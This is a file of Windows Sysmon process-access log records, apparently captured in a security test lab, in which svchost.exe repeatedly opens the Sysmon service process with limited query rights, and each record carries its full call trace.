{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1418,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.171\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.171","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1419,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.171\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.171","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1420,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.171\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.171","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1421,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.171\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.171","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1422,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.171\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.171","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1423,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.171\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.171","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1424,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.173\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.173","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1425,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.173\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.173","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
